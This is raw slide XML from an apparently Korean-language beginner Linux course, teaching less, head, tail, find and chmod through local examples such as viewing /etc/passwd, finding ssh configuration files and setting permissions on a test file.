                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>root:x:0:0:root:/root:/bin/bash</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>bin:x:1:1:bin:/bin:/</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daemon:x:2:2:daemon:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:/</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adm:x:3:4:adm:/var/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>adm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:/</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lp:x:4:7:lp:/var/spool/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>lpd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>nologin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[root@localhost log]# less /etc/passwd</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>rpcuser:x:29:29:RPC Service User:/var/lib/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>nfs</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:/</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nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>nfs</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:/</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mailnull:x:47:47::/var/spool/mqueue:/</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smmsp:x:51:51::/var/spool/mqueue:/</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distcache:x:94:94:Distcache:/:/</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highlight>
                    <a:srgbClr val="A6A6A6"/>
                  </a:highlight>
                </a:rPr>
                <a:t>/etc/passwd</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:highlight>
                  <a:srgbClr val="A6A6A6"/>
                </a:highlight>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>위에서 아래</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>아래에서 위로 둘 다 이동이 가능</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>화살표키</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>, Page Up, Page Down </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>키가 작동함</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>파일을 다 읽고 나가기 위해서는 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>q</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>키를 눌러야 함</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pP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a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[root@localhost log]# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>head –n 5</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> /etc/passwd  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>문서의 머리</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>(head)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>부분을 출력</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100"/>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>n</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>옵션으로 출력하고 싶은 라인 수를 입력할 수 있음</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>. </a:t>
              </a:r>
              <a:endParaRPr lang="nb-NO" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>[root@localhost log]# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>tail –n 5</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> /etc/passwd  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>문서의 꼬리</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>(tail)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>부분을 출력</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100"/>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>n</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>옵션으로 출력하고 싶은 라인 수를 입력할 수 있음</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>. </a:t>
              </a:r>
              <a:endParaRPr lang="nb-NO" altLang="ko-KR" sz="1100"/>
            </a:p>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/Theory/T2/12</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find</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특정 파일이나 디렉토리를 검색</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log]# find /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -name "</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ssh</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>*"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>pam.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>sshd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rc.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>init.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>sshd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>ssh</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>ssh</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/ssh_host_dsa_key.pub</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>ssh</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/ssh_host_key.pub</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>ssh</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>ssh_host_rsa_key</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>ssh</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/ssh_host_rsa_key.pub</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>ssh</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>ssh_config</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>ssh</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>ssh_host_dsa_key</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>ssh</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>ssh_host_key</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>ssh</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>sshd_config</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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cd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cd /test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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>findme</a:t>
              </a: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find /test -perm 777</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find /test -perm 644</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/test/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>findme</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/test/first</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pP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/Intro</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>교수소개</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6</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>전문사관 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>기 임관</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="140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/Theory/T2/13</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sz="4400" kern="0" spc="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>chmod</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특정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일의 권한 변경</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cd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cd /test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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>findme</a:t>
              </a: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find /test -perm 777</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 777 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>findme</a:t>
              </a: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find /test -perm 777</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/test/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>findme</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>16</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  2 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>28 12:21 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x 26 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>27 20:08 ..</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rwxrwxrwx</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>    0  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>28 12:24 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>findme</a:t>
              </a:r>
